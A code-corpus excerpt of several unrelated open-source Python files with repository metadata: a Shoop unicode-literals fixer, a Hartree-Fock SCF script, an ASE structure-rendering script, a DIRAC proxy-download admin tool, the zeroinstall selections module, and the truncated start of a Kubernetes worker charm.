# -*- coding: utf-8 -*- # This file is part of Shoop. # # Copyright (c) 2012-2016, Shoop Ltd. All rights reserved. # # This source code is licensed under the AGPLv3 license found in the # LICENSE file in the root directory of this source tree. import re from ast import BinOp, Mod, parse from six import text_type import click from sanity_utils import find_files, XNodeVisitor encoding_comment_regexp = re.compile(r'^#.+coding[=:]\s*([-\w.]+).+$', re.MULTILINE | re.I) class StringVisitor(XNodeVisitor): def __init__(self): self.texts = set() self.formattees = set() def visit_Str(self, node, parents): # noqa (N802) s = text_type(node.s) is_being_formatted = (parents and isinstance(parents[-1], BinOp) and isinstance(parents[-1].op, Mod)) if is_being_formatted: self.formattees.add(s) return if not ("\n" in s or s.islower() or s.isupper()): # Doesn't look like a constant or docstring if " " in s.strip(): # Has spaces, that's texty if "%" in s or not all(32 <= ord(c) < 127 for c in s): # Has a formatting character or is non-ascii self.texts.add(s) def get_stats(self): stat_bits = [] if self.texts: stat_bits.append("%d text-like strings" % len(self.texts)) if self.formattees: stat_bits.append("%d formattee strings" % len(self.formattees)) return ", ".join(stat_bits) def needs_fix(self): return bool(self.texts or self.formattees) def process_file(path): sv = StringVisitor() with open(path, "rb") as fp: source = fp.read() if b"unicode_literals" not in source: sv.visit(parse(source, path)) return sv def fix_file(path): with open(path, "rb") as fp: source = fp.read().decode("utf-8") source_lines = source.splitlines() need_encoding_comment = any(ord(c) > 127 for c in source) first_non_comment_line_index = 0 for line_index, line in enumerate(source_lines): if not line.strip(): continue if encoding_comment_regexp.match(line): need_encoding_comment = False if not line.startswith("#"): first_non_comment_line_index = line_index break if "from __future__ import unicode_literals" not in source: source_lines.insert(first_non_comment_line_index, "from __future__ import unicode_literals") source = "\n".join(source_lines) if need_encoding_comment: source = "# -*- coding: utf-8 -*-\n" + source with open(path, "wb") as fp: fp.write(source.encode("utf-8")) fp.write(b"\n") def gather_files(dirnames, filenames): files_to_process = [] files_to_process.extend(filename for filename in filenames if filename.endswith(".py")) files_to_process.extend(find_files(dirnames, allowed_extensions=(".py",))) return files_to_process @click.command() @click.option("-f", "--file", "filenames", type=click.Path(exists=True, dir_okay=False), multiple=True) @click.option("-d", "--dir", "dirnames", type=click.Path(exists=True, file_okay=False), multiple=True) @click.option('--fix/--no-fix', default=False) def command(filenames, dirnames, fix): for filename in gather_files(dirnames, filenames): visitor = process_file(filename) if visitor.needs_fix(): print("%s: %s" % (filename, visitor.get_stats())) if fix: print("Fixing: %s" % filename) fix_file(filename) if __name__ == "__main__": command()
akx/shoop
_misc/ensure_unicode_literals.py
Python
agpl-3.0
3,600
[ "VisIt" ]
4ab03fb022ee855296d6d4284ba25bded95a82c7d185751236a201d8c77f3a05
import sys import numpy as np import numpy.linalg as npl from eric.molecule import Molecule from eric.utils import print_mat np.set_printoptions(precision=8, linewidth=200, suppress=True) def getargs(): import argparse parser = argparse.ArgumentParser() parser.add_argument('--stub', default="h2o_sto3g") parser.add_argument('--nbasis', type=int, default=7) parser.add_argument('--nelec', type=int, default=10) parser.add_argument('--thresh-e', type=int, default=15) parser.add_argument('--thresh-d', type=int, default=10) parser.add_argument('--guess', choices=('hcore', 'gwh'), default='hcore', help="""How should the guess for the initial MO coefficients be obtained?""") args = parser.parse_args() return args def parse_file_1(filename): with open(filename) as fh: val = float(fh.readline()) return val def parse_int_file_2(filename, dim): mat = np.zeros(shape=(dim, dim)) with open(filename) as fh: contents = fh.readlines() for line in contents: mu, nu, intval = map(float, line.split()) mu, nu = int(mu - 1), int(nu - 1) mat[mu, nu] = mat[nu, mu] = intval return mat def parse_int_file_4(filename, dim): # be very inefficient with how we store these for now -- use all 4 # indices mat = np.zeros(shape=(dim, dim, dim, dim)) with open(filename) as fh: contents = fh.readlines() for line in contents: mu, nu, lm, sg, intval = map(float, line.split()) mu, nu, lm, sg = int(mu - 1), int(nu - 1), int(lm - 1), int(sg - 1) mat[mu, nu, lm, sg] = \ mat[mu, nu, sg, lm] = \ mat[nu, mu, lm, sg] = \ mat[nu, mu, sg, lm] = \ mat[lm, sg, mu, nu] = \ mat[lm, sg, nu, mu] = \ mat[sg, lm, mu, nu] = \ mat[sg, lm, nu, mu] = intval return mat ## This doesn't work like it does for the Fock build. # def build_density(P, C, nbasis, nocc): # for mu in range(nbasis): # for nu in range(nbasis): # for m in range(nocc): # P[mu, nu] += C[mu, m] * C[nu, m] # return def build_density(C, nocc): """Form the density matrix from contraction over the occupied columns of the MO coefficient matrix. """ return np.dot(C[:, :nocc], C[:, :nocc].T) def calc_elec_energy(P, H, F): """Calculate the electronic energy from contracting the density matrix with the one- (core Hamiltonian) and two- (Fock matrix) electron components of the Hamiltonian. """ return np.sum(P * (H + F)) def build_fock(F, P, H, ERI, nbasis): """Build the Fock matrix in-place.""" for mu in range(H.shape[0]): for nu in range(H.shape[1]): F[mu, nu] = H[mu, nu] for lm in range(P.shape[0]): for sg in range(P.shape[1]): F[mu, nu] += (P[lm, sg] * (2*ERI[mu, nu, lm, sg] - ERI[mu, lm, nu, sg])) return def rmsd_density(D_new, D_old): """Calculate the root mean square deviation between two density matrices. """ return np.sqrt(np.sum((D_new - D_old)**2)) def population_analysis(mol, pop_mat, basis_function_indices): """Perform population analysis...""" charges = [] for i in range(mol.size): # The basis function indices for each atom. bfi = basis_function_indices[i] # Take the trace of the "population" matrix block # corresponding to each individual atom. Assuming that the # indices are in order, and the block is bounded by the first # and last elements of bfi. Is there a better way to do fancy # indexing here? tr = np.trace(pop_mat[bfi[0]:bfi[-1]+1, bfi[0]:bfi[-1]+1]) # Definition of the final charge. charge = mol.charges[i] - 2 * tr charges.append(charge) return np.asarray(charges) def guess_gwh(mat_h, mat_s, cx=1.75): """From the core Hamiltonian and overlap matrices, form the matrix for the generalized Wolfsberg-Helmholz approximation (DOI: 10.1063/1.1700580) The default value of 1.75 is from the Q-Chem 4.3 manual. """ assert mat_h.shape == mat_s.shape nr, nc = mat_h.shape assert nr == nc mat_gwh = np.empty_like(mat_h) for mu in range(nr): for nu in range(nc): mat_gwh[mu, nu] = mat_s[mu, nu] * (mat_h[mu, mu] + mat_h[nu, nu]) mat_gwh *= (cx / 2) return mat_gwh if __name__ == "__main__": args = getargs() nelec = args.nelec nocc = nelec // 2 dim = nbasis = args.nbasis stub = args.stub + "_" mol = Molecule(stub + "geom.dat") filename_enuc = stub + "enuc.dat" filename_s = stub + "s.dat" filename_t = stub + "t.dat" filename_v = stub + "v.dat" filename_eri = stub + "eri.dat" e_nuc = parse_file_1(filename_enuc) mat_s = parse_int_file_2(filename_s, dim) mat_t = parse_int_file_2(filename_t, dim) mat_v = parse_int_file_2(filename_v, dim) mat_eri = parse_int_file_4(filename_eri, dim) print("Nuclear repulsion energy = {}\n".format(e_nuc)) print("Overlap Integrals:") print_mat(mat_s) print("Kinetic-Energy Integrals:") print_mat(mat_t) print("Nuclear Attraction Integrals:") print_mat(mat_v) mat_h = mat_t + mat_v print("Core Hamiltonian:") print_mat(mat_h) lam_s, l_s = npl.eigh(mat_s) lam_s = lam_s * np.eye(len(lam_s)) lam_sqrt_inv = np.sqrt(npl.inv(lam_s)) symm_orthog = np.dot(l_s, np.dot(lam_sqrt_inv, l_s.T)) print("S^-1/2 Matrix:") print_mat(symm_orthog) if args.guess == "hcore": f_prime = np.dot(symm_orthog.T, np.dot(mat_h, symm_orthog)) elif args.guess == "gwh": mat_gwh = guess_gwh(mat_h, mat_s, cx=1.75) f_prime = np.dot(symm_orthog.T, np.dot(mat_gwh, symm_orthog)) else: print("Invalid guess.", file=sys.stderr) sys.exit(1) print("Initial F' Matrix:") print_mat(f_prime) eps, c_prime = npl.eigh(f_prime) eps = eps * np.eye(len(eps)) c = np.dot(symm_orthog, c_prime) print("Initial C Matrix:") print_mat(c) d = build_density(c, nocc) print("Initial Density Matrix:") print_mat(d) e_elec_new = calc_elec_energy(d, mat_h, mat_h) e_total = e_elec_new + e_nuc delta_e = e_total print(" Iter E(elec) E(tot) Delta(E) RMS(D)") print(" {:4d} {:20.12f} {:20.12f}".format(0, e_elec_new, e_total)) t = " {:4d} {:20.12f} {:20.12f} {:20.12f} {:20.12f}".format f = np.empty(shape=(nbasis, nbasis)) thresh_e = 10**(-args.thresh_e) thresh_d = 10**(-args.thresh_d) iteration = 1 max_iterations = 1024 rmsd_d = 99999.9 while iteration < max_iterations: build_fock(f, d, mat_h, mat_eri, nbasis) f_prime = np.dot(symm_orthog.T, np.dot(f, symm_orthog)) eps, c_prime = npl.eigh(f_prime) eps = eps * np.eye(len(eps)) c = np.dot(symm_orthog, c_prime) d_old = d d = build_density(c, nocc) e_elec_old = e_elec_new e_elec_new = calc_elec_energy(d, mat_h, f) e_tot = e_elec_new + e_nuc if iteration == 1: print("Fock Matrix:") print_mat(f) print(t(iteration, e_elec_new, e_tot, 0.0, 0.0)) else: print(t(iteration, e_elec_new, e_tot, delta_e, rmsd_d)) delta_e = e_elec_new - e_elec_old rmsd_d = rmsd_density(d, d_old) if (delta_e < thresh_e) and (rmsd_d < thresh_d): print("Convergence achieved.") break f = f_prime iteration += 1 # At convergence, the Fock matrix should be diagonal in the MO # basis. f_mo = np.dot(c.T, np.dot(f, c)) print_mat(f_mo) # Save things to disk for use in other routines. np.savez_compressed("H.npz", mat_h) np.savez_compressed("TEI_AO.npz", mat_eri) np.savez_compressed("C.npz", c) np.savez_compressed("F_MO.npz", f_mo) mat_dipole_x = parse_int_file_2(stub + "mux.dat", dim) mat_dipole_y = parse_int_file_2(stub + "muy.dat", dim) mat_dipole_z = parse_int_file_2(stub + "muz.dat", dim) dipole_elec = 2 * np.array([np.sum(d * mat_dipole_x), np.sum(d * mat_dipole_y), np.sum(d * mat_dipole_z)]) dipole_moment_elec = npl.norm(dipole_elec) dipole_nuc = mol.calc_dipole_nuc() dipole_moment_nuc = npl.norm(dipole_nuc) dipole_total = dipole_elec + dipole_nuc dipole_moment_total = npl.norm(dipole_total) print("Dipole components (electronic, a.u.):") print("X: {:20.12f}".format(dipole_elec[0])) print("Y: {:20.12f}".format(dipole_elec[1])) print("Z: {:20.12f}".format(dipole_elec[2])) print("Dipole components (nuclear, a.u.):") print("X: {:20.12f}".format(dipole_nuc[0])) print("Y: {:20.12f}".format(dipole_nuc[1])) print("Z: {:20.12f}".format(dipole_nuc[2])) print("Dipole components (total, a.u.):") print("X: {:20.12f}".format(dipole_total[0])) print("Y: {:20.12f}".format(dipole_total[1])) print("Z: {:20.12f}".format(dipole_total[2])) print("Dipole moment (a.u.):") print("electronic: {:20.12f}".format(dipole_moment_elec)) print("nuclear : {:20.12f}".format(dipole_moment_nuc)) print("total : {:20.12f}".format(dipole_moment_total)) # This is cheating. How to determine this automatically without # any a priori knowledge of the basis set? basis_function_indices = [ [0, 1, 2, 3, 4,], [5,], [6,], ] # Mulliken population analysis. mat_mulliken = np.dot(d, mat_s) charges_mulliken = population_analysis(mol, mat_mulliken, basis_function_indices) print("Population analysis (Mulliken):") print(" Charges:") for i in range(mol.size): print(" {:3d} {:3d} {:20.12f}".format(i + 1, mol.charges[i], charges_mulliken[i])) print(sum(charges_mulliken)) print(" trace: {}".format(np.trace(mat_mulliken))) # Loewdin population analysis. mat_loewdin = np.dot(npl.inv(symm_orthog), np.dot(d, npl.inv(symm_orthog))) charges_loewdin = population_analysis(mol, mat_loewdin, basis_function_indices) print("Population analysis (Loewdin):") print(" Charges:") for i in range(mol.size): print(" {:3d} {:3d} {:20.12f}".format(i + 1, mol.charges[i], charges_loewdin[i])) print(sum(charges_loewdin)) print(" trace: {}".format(np.trace(mat_loewdin)))
berquist/programming_party
eric/project3/project3.py
Python
mpl-2.0
10,708
[ "Q-Chem" ]
618e75ebcf5b806ac440c2f04f36f27440c7a759d72839cf99969d6585101fd0
# creates: a1.png a2.png a3.png cnt1.png cnt2.png gnr1.png gnr2.png from ase.io import write from ase.lattice import bulk from ase.structure import nanotube, graphene_nanoribbon import numpy as np for i, a in enumerate([ bulk('Cu', 'fcc', a=3.6), bulk('Cu', 'fcc', a=3.6, orthorhombic=True), bulk('Cu', 'fcc', a=3.6, cubic=True)]): write('a%d.pov' % (i + 1), a, show_unit_cell=2, display=False, run_povray=True) cnt1 = nanotube(6, 0, length=4) cnt1.rotate('x', 'z', rotate_cell=True) cnt2 = nanotube(3, 3, length=6, bond=1.4, symbol='Si') cnt2.rotate('x', 'z', rotate_cell=True) for i, a in enumerate([cnt1, cnt2]): write('cnt%d.pov' % (i + 1), a, show_unit_cell=2, display=False, run_povray=True) ind = [2, 0, 1] gnr1 = graphene_nanoribbon(3, 4, type='armchair', saturated=True) gnr1.set_cell(np.diag(gnr1.cell)[ind]) gnr1.positions = gnr1.positions[:, ind] gnr2 = graphene_nanoribbon(2, 6, type='zigzag', saturated=True, C_H=1.1, C_C=1.4, vacuum=3.0, magnetic=True, initial_mag=1.12) gnr2.set_cell(np.diag(gnr2.cell)[ind]) gnr2.positions = gnr2.positions[:, ind] for i, a in enumerate([gnr1, gnr2]): write('gnr%d.pov' % (i + 1), a, show_unit_cell=2, display=False, run_povray=True)
grhawk/ASE
tools/doc/ase/structure.py
Python
gpl-2.0
1,298
[ "ASE" ]
7cad5537c40432e00f5cc6ddf0096c4d13f9cd3fce36b92d674e02632dc3087c
#!/usr/bin/env python ######################################################################## # File : dirac-admin-get-proxy # Author : Stuart Paterson ######################################################################## """ Retrieve a delegated proxy for the given user and group """ from __future__ import print_function import os import DIRAC from DIRAC.Core.Base import Script from DIRAC.FrameworkSystem.Client.ProxyManagerClient import gProxyManager from DIRAC.ConfigurationSystem.Client.Helpers import Registry __RCSID__ = "$Id$" class Params: limited = False proxyPath = False proxyLifeTime = 86400 enableVOMS = False vomsAttr = False def setLimited( self, args ): self.limited = True return DIRAC.S_OK() def setProxyLocation( self, args ): self.proxyPath = args return DIRAC.S_OK() def setProxyLifeTime( self, arg ): try: fields = [ f.strip() for f in arg.split( ":" ) ] self.proxyLifeTime = int( fields[0] ) * 3600 + int( fields[1] ) * 60 except: print("Can't parse %s time! Is it a HH:MM?" % arg) return DIRAC.S_ERROR( "Can't parse time argument" ) return DIRAC.S_OK() def automaticVOMS( self, arg ): self.enableVOMS = True return DIRAC.S_OK() def setVOMSAttr( self, arg ): self.enableVOMS = True self.vomsAttr = arg return DIRAC.S_OK() def registerCLISwitches( self ): Script.registerSwitch( "v:", "valid=", "Valid HH:MM for the proxy. By default is 24 hours", self.setProxyLifeTime ) Script.registerSwitch( "l", "limited", "Get a limited proxy", self.setLimited ) Script.registerSwitch( "u:", "out=", "File to write as proxy", self.setProxyLocation ) Script.registerSwitch( "a", "voms", "Get proxy with VOMS extension mapped to the DIRAC group", self.automaticVOMS ) Script.registerSwitch( "m:", "vomsAttr=", "VOMS attribute to require", self.setVOMSAttr ) params = Params() params.registerCLISwitches() Script.setUsageMessage( '\n'.join( [ __doc__.split( '\n' )[1], 'Usage:', ' %s [option|cfgfile] ... <DN|user> group' % Script.scriptName, 'Arguments:', ' DN: DN of the user', ' user: DIRAC user name (will fail if there is more than 1 DN registered)', ' group: DIRAC group name' ] ) ) Script.parseCommandLine( ignoreErrors = True ) args = Script.getPositionalArgs() if len( args ) != 2: Script.showHelp() userGroup = str( args[1] ) userDN = str( args[0] ) userName = False if userDN.find( "/" ) != 0: userName = userDN retVal = Registry.getDNForUsername( userName ) if not retVal[ 'OK' ]: print("Cannot discover DN for username %s\n\t%s" % (userName, retVal['Message'])) DIRAC.exit( 2 ) DNList = retVal[ 'Value' ] if len( DNList ) > 1: print("Username %s has more than one DN registered" % userName) ind = 0 for dn in DNList: print("%d %s" % (ind, dn)) ind += 1 inp = raw_input( "Which DN do you want to download? [default 0] " ) if not inp: inp = 0 else: inp = int( inp ) userDN = DNList[inp] else: userDN = DNList[0] if not params.proxyPath: if not userName: result = Registry.getUsernameForDN( userDN ) if not result[ 'OK' ]: print("DN '%s' is not registered in DIRAC" % userDN) DIRAC.exit( 2 ) userName = result[ 'Value' ] params.proxyPath = "%s/proxy.%s.%s" % ( os.getcwd(), userName, userGroup ) if params.enableVOMS: result = gProxyManager.downloadVOMSProxy( userDN, userGroup, limited = params.limited, requiredTimeLeft = params.proxyLifeTime, requiredVOMSAttribute = params.vomsAttr ) else: result = gProxyManager.downloadProxy( userDN, userGroup, limited = params.limited, requiredTimeLeft = params.proxyLifeTime ) if not result['OK']: print('Proxy file cannot be retrieved: %s' % result['Message']) DIRAC.exit( 2 ) chain = result[ 'Value' ] result = chain.dumpAllToFile( params.proxyPath ) if not result['OK']: print('Proxy file cannot be written to %s: %s' % (params.proxyPath, result['Message'])) DIRAC.exit( 2 ) print("Proxy downloaded to %s" % params.proxyPath) DIRAC.exit( 0 )
petricm/DIRAC
FrameworkSystem/scripts/dirac-admin-get-proxy.py
Python
gpl-3.0
4,433
[ "DIRAC" ]
3d706458477e411fddf682efee54810601b853d9df8bc56a8876b3ffc7e47d03
""" Load and save a set of chosen implementations. @since: 0.27 """ # Copyright (C) 2009, Thomas Leonard # See the README file for details, or visit http://0install.net. import os from zeroinstall import _, zerostore from zeroinstall.injector import model from zeroinstall.injector.policy import get_deprecated_singleton_config from zeroinstall.injector.model import process_binding, process_depends, binding_names, Command from zeroinstall.injector.namespaces import XMLNS_IFACE from zeroinstall.injector.qdom import Element, Prefixes from zeroinstall.support import tasks, basestring class Selection(object): """A single selected implementation in a L{Selections} set. @ivar dependencies: list of dependencies @type dependencies: [L{model.Dependency}] @ivar attrs: XML attributes map (name is in the format "{namespace} {localName}") @type attrs: {str: str} @ivar version: the implementation's version number @type version: str""" interface = property(lambda self: self.attrs['interface']) id = property(lambda self: self.attrs['id']) version = property(lambda self: self.attrs['version']) feed = property(lambda self: self.attrs.get('from-feed', self.interface)) main = property(lambda self: self.attrs.get('main', None)) @property def local_path(self): local_path = self.attrs.get('local-path', None) if local_path: return local_path if self.id.startswith('/'): return self.id return None def __repr__(self): """@rtype: str""" return self.id def is_available(self, stores): """Is this implementation available locally? (a local implementation or a cached ZeroInstallImplementation) @rtype: bool @since: 0.53""" path = self.local_path if path is not None: return os.path.exists(path) path = stores.lookup_maybe(self.digests) return path is not None def get_path(self, stores, missing_ok = False): """Return the root directory of this implementation. For local implementations, this is L{local_path}. For cached implementations, this is the directory in the cache. @param stores: stores to search @type stores: L{zerostore.Stores} @param missing_ok: return None for uncached implementations @type missing_ok: bool @return: the path of the directory @rtype: str | None @since: 1.8""" if self.local_path is not None: return self.local_path if not self.digests: # (for now, we assume this is always an error, even for missing_ok) raise model.SafeException("No digests for {feed} {version}".format(feed = self.feed, version = self.version)) if missing_ok: return stores.lookup_maybe(self.digests) else: return stores.lookup_any(self.digests) class ImplSelection(Selection): """A Selection created from an Implementation""" __slots__ = ['impl', 'dependencies', 'attrs', '_used_commands'] def __init__(self, iface_uri, impl, dependencies): """@type iface_uri: str @type impl: L{zeroinstall.injector.model.Implementation} @type dependencies: [L{zeroinstall.injector.model.Dependency}]""" assert impl self.impl = impl self.dependencies = dependencies self._used_commands = {} # name -> Command attrs = impl.metadata.copy() attrs['id'] = impl.id attrs['version'] = impl.get_version() attrs['interface'] = iface_uri attrs['from-feed'] = impl.feed.url if impl.local_path: attrs['local-path'] = impl.local_path self.attrs = attrs @property def bindings(self): return self.impl.bindings @property def digests(self): return self.impl.digests def get_command(self, name): assert name in self._used_commands, "internal error: '{command}' not in my commands list".format(command = name) return self._used_commands[name] def get_commands(self): return self._used_commands class XMLSelection(Selection): """A Selection created by reading an XML selections document. @ivar digests: a list of manifest digests @type digests: [str] """ __slots__ = ['bindings', 'dependencies', 'attrs', 'digests', 'commands'] def __init__(self, dependencies, bindings = None, attrs = None, digests = None, commands = None): """@type dependencies: [L{zeroinstall.injector.model.Dependency}] @type bindings: [L{zeroinstall.injector.model.Binding}] | None @type attrs: {str: str} | None @type digests: [str] | None @type commands: {str: L{Command}} | None""" if bindings is None: bindings = [] if digests is None: digests = [] self.dependencies = dependencies self.bindings = bindings self.attrs = attrs self.digests = digests self.commands = commands assert self.interface assert self.id assert self.version assert self.feed def get_command(self, name): """@type name: str @rtype: L{Command}""" if name not in self.commands: raise model.SafeException("Command '{name}' not present in selections for {iface}".format(name = name, iface = self.interface)) return self.commands[name] def get_commands(self): """@rtype: {str: L{Command}}""" return self.commands class Selections(object): """ A selected set of components which will make up a complete program. @ivar interface: the interface of the program @type interface: str @ivar command: the command to run on 'interface' @type command: str @ivar selections: the selected implementations @type selections: {str: L{Selection}} """ __slots__ = ['interface', 'selections', 'command'] def __init__(self, source): """Constructor. @param source: a map of implementations, policy or selections document @type source: L{Element}""" self.selections = {} self.command = None if source is None: # (Solver will fill everything in) pass elif isinstance(source, Element): self._init_from_qdom(source) else: raise Exception(_("Source not a qdom.Element!")) def _init_from_qdom(self, root): """Parse and load a selections document. @param root: a saved set of selections. @type root: L{Element}""" self.interface = root.getAttribute('interface') self.command = root.getAttribute('command') if self.interface is None: raise model.SafeException(_("Not a selections document (no 'interface' attribute on root)")) old_commands = [] for selection in root.childNodes: if selection.uri != XMLNS_IFACE: continue if selection.name != 'selection': if selection.name == 'command': old_commands.append(Command(selection, None)) continue requires = [] bindings = [] digests = [] commands = {} for elem in selection.childNodes: if elem.uri != XMLNS_IFACE: continue if elem.name in binding_names: bindings.append(process_binding(elem)) elif elem.name == 'requires': dep = process_depends(elem, None) requires.append(dep) elif elem.name == 'manifest-digest': for aname, avalue in elem.attrs.items(): digests.append(zerostore.format_algorithm_digest_pair(aname, avalue)) elif elem.name == 'command': name = elem.getAttribute('name') assert name, "Missing name attribute on <command>" commands[name] = Command(elem, None) # For backwards compatibility, allow getting the digest from the ID sel_id = selection.attrs['id'] local_path = selection.attrs.get("local-path", None) if (not digests and not local_path) and '=' in sel_id: alg = sel_id.split('=', 1)[0] if alg in ('sha1', 'sha1new', 'sha256'): digests.append(sel_id) iface_uri = selection.attrs['interface'] s = XMLSelection(requires, bindings, selection.attrs, digests, commands) self.selections[iface_uri] = s if self.command is None: # Old style selections document if old_commands: # 0launch 0.52 to 1.1 self.command = 'run' iface = self.interface for command in old_commands: command.qdom.attrs['name'] = 'run' self.selections[iface].commands['run'] = command runner = command.get_runner() if runner: iface = runner.interface else: iface = None else: # 0launch < 0.51 root_sel = self.selections[self.interface] main = root_sel.attrs.get('main', None) if main is not None: root_sel.commands['run'] = Command(Element(XMLNS_IFACE, 'command', {'path': main, 'name': 'run'}), None) self.command = 'run' elif self.command == '': # New style, but no command requested self.command = None assert not old_commands, "<command> list in new-style selections document!" def toDOM(self): """Create a DOM document for the selected implementations. The document gives the URI of the root, plus each selected implementation. For each selected implementation, we record the ID, the version, the URI and (if different) the feed URL. We also record all the bindings needed. @return: a new DOM Document""" from xml.dom import minidom, XMLNS_NAMESPACE assert self.interface impl = minidom.getDOMImplementation() doc = impl.createDocument(XMLNS_IFACE, "selections", None) root = doc.documentElement root.setAttributeNS(XMLNS_NAMESPACE, 'xmlns', XMLNS_IFACE) root.setAttributeNS(None, 'interface', self.interface) root.setAttributeNS(None, 'command', self.command or "") prefixes = Prefixes(XMLNS_IFACE) for iface, selection in sorted(self.selections.items()): selection_elem = doc.createElementNS(XMLNS_IFACE, 'selection') selection_elem.setAttributeNS(None, 'interface', selection.interface) root.appendChild(selection_elem) for name, value in selection.attrs.items(): if ' ' in name: ns, localName = name.split(' ', 1) prefixes.setAttributeNS(selection_elem, ns, localName, value) elif name == 'stability': pass elif name == 'from-feed': # Don't bother writing from-feed attr if it's the same as the interface if value != selection.attrs['interface']: selection_elem.setAttributeNS(None, name, value) elif name not in ('main', 'self-test'): # (replaced by <command>) selection_elem.setAttributeNS(None, name, value) if selection.digests: manifest_digest = doc.createElementNS(XMLNS_IFACE, 'manifest-digest') for digest in selection.digests: aname, avalue = zerostore.parse_algorithm_digest_pair(digest) assert ':' not in aname manifest_digest.setAttribute(aname, avalue) selection_elem.appendChild(manifest_digest) for b in selection.bindings: selection_elem.appendChild(b._toxml(doc, prefixes)) for dep in selection.dependencies: if not isinstance(dep, model.InterfaceDependency): continue dep_elem = doc.createElementNS(XMLNS_IFACE, 'requires') dep_elem.setAttributeNS(None, 'interface', dep.interface) selection_elem.appendChild(dep_elem) for m in dep.metadata: parts = m.split(' ', 1) if len(parts) == 1: ns = None localName = parts[0] dep_elem.setAttributeNS(None, localName, dep.metadata[m]) else: ns, localName = parts prefixes.setAttributeNS(dep_elem, ns, localName, dep.metadata[m]) for b in dep.bindings: dep_elem.appendChild(b._toxml(doc, prefixes)) for command in selection.get_commands().values(): selection_elem.appendChild(command._toxml(doc, prefixes)) for ns, prefix in prefixes.prefixes.items(): root.setAttributeNS(XMLNS_NAMESPACE, 'xmlns:' + prefix, ns) return doc def __repr__(self): return "Selections for " + self.interface def get_unavailable_selections(self, config, include_packages): """Find those selections which are not present. Local implementations are available if their directory exists. Other 0install implementations are available if they are in the cache. Package implementations are available if the Distribution says so. @param include_packages: whether to include <package-implementation>s @type include_packages: bool @rtype: [Selection] @since: 1.16""" iface_cache = config.iface_cache stores = config.stores # Check that every required selection is cached def needs_download(sel): if sel.id.startswith('package:'): if not include_packages: return False feed = iface_cache.get_feed(sel.feed) if not feed: return False impl = feed.implementations.get(sel.id, None) return impl is None or not impl.installed elif sel.local_path: return False else: return sel.get_path(stores, missing_ok = True) is None return [sel for sel in self.selections.values() if needs_download(sel)] def download_missing(self, config, _old = None, include_packages = False): """Check all selected implementations are available. Download any that are not present. Since native distribution packages are usually only available in a single version, which is unlikely to be the one in the selections document, we ignore them by default. Note: package implementations (distribution packages) are ignored. @param config: used to get iface_cache, stores and fetcher @param include_packages: also try to install native packages (since 1.5) @type include_packages: bool @rtype: L{zeroinstall.support.tasks.Blocker} | None""" if _old: config = get_deprecated_singleton_config() iface_cache = config.iface_cache stores = config.stores needed_downloads = self.get_unavailable_selections(config, include_packages) if not needed_downloads: return if config.network_use == model.network_offline: from zeroinstall import NeedDownload raise NeedDownload(', '.join([str(x) for x in needed_downloads])) @tasks.async def download(): # We're missing some. For each one, get the feed it came from # and find the corresponding <implementation> in that. This will # tell us where to get it from. # Note: we look for an implementation with the same ID. Maybe we # should check it has the same digest(s) too? needed_impls = [] for sel in needed_downloads: feed_url = sel.attrs.get('from-feed', None) or sel.attrs['interface'] feed = iface_cache.get_feed(feed_url) if feed is None or sel.id not in feed.implementations: fetch_feed = config.fetcher.download_and_import_feed(feed_url, iface_cache) yield fetch_feed tasks.check(fetch_feed) feed = iface_cache.get_feed(feed_url) assert feed, "Failed to get feed for %s" % feed_url impl = feed.implementations[sel.id] needed_impls.append(impl) fetch_impls = config.fetcher.download_impls(needed_impls, stores) yield fetch_impls tasks.check(fetch_impls) return download() # These (deprecated) methods are to make a Selections object look like the old Policy.implementation map... def __getitem__(self, key): # Deprecated """@type key: str @rtype: L{ImplSelection}""" if isinstance(key, basestring): return self.selections[key] sel = self.selections[key.uri] return sel and sel.impl def iteritems(self): # Deprecated iface_cache = get_deprecated_singleton_config().iface_cache for (uri, sel) in self.selections.items(): yield (iface_cache.get_interface(uri), sel and sel.impl) def values(self): # Deprecated """@rtype: L{zeroinstall.injector.model.Implementation}""" for (uri, sel) in self.selections.items(): yield sel and sel.impl def __iter__(self): # Deprecated iface_cache = get_deprecated_singleton_config().iface_cache for (uri, sel) in self.selections.items(): yield iface_cache.get_interface(uri) def get(self, iface, if_missing): # Deprecated """@type iface: L{zeroinstall.injector.model.Interface} @rtype: L{zeroinstall.injector.model.Implementation}""" sel = self.selections.get(iface.uri, None) if sel: return sel.impl return if_missing def copy(self): # Deprecated s = Selections(None) s.interface = self.interface s.selections = self.selections.copy() return s def items(self): # Deprecated return list(self.iteritems()) @property def commands(self): i = self.interface c = self.command commands = [] while c is not None: sel = self.selections[i] command = sel.get_command(c) commands.append(command) runner = command.get_runner() if not runner: break i = runner.metadata['interface'] c = runner.qdom.attrs.get('command', 'run') return commands
res2k/0install
zeroinstall/injector/selections.py
Python
lgpl-2.1
16,010
[ "VisIt" ]
08383e725e0028e904c3567b2dfa61020eff9ec377359f6a5b66ab0475affc94
#!/usr/bin/env python # Copyright 2015 The Kubernetes Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import json import os import random import shutil import subprocess import time from shlex import split from subprocess import check_call, check_output from subprocess import CalledProcessError from socket import gethostname, getfqdn from charms import layer from charms.layer import snap from charms.reactive import hook from charms.reactive import set_state, remove_state, is_state from charms.reactive import when, when_any, when_not from charms.kubernetes.common import get_version from charms.reactive.helpers import data_changed, any_file_changed from charms.templating.jinja2 import render from charmhelpers.core import hookenv, unitdata from charmhelpers.core.host import service_stop, service_restart from charmhelpers.contrib.charmsupport import nrpe # Override the default nagios shortname regex to allow periods, which we # need because our bin names contain them (e.g. 'snap.foo.daemon'). The # default regex in charmhelpers doesn't allow periods, but nagios itself does. nrpe.Check.shortname_re = '[\.A-Za-z0-9-_]+$' kubeconfig_path = '/root/cdk/kubeconfig' kubeproxyconfig_path = '/root/cdk/kubeproxyconfig' kubeclientconfig_path = '/root/.kube/config' os.environ['PATH'] += os.pathsep + os.path.join(os.sep, 'snap', 'bin') db = unitdata.kv() @hook('upgrade-charm') def upgrade_charm(): # Trigger removal of PPA docker installation if it was previously set. set_state('config.changed.install_from_upstream') hookenv.atexit(remove_state, 'config.changed.install_from_upstream') cleanup_pre_snap_services() check_resources_for_upgrade_needed() # Remove the RC for nginx ingress if it exists if hookenv.config().get('ingress'): kubectl_success('delete', 'rc', 'nginx-ingress-controller') # Remove gpu.enabled state so 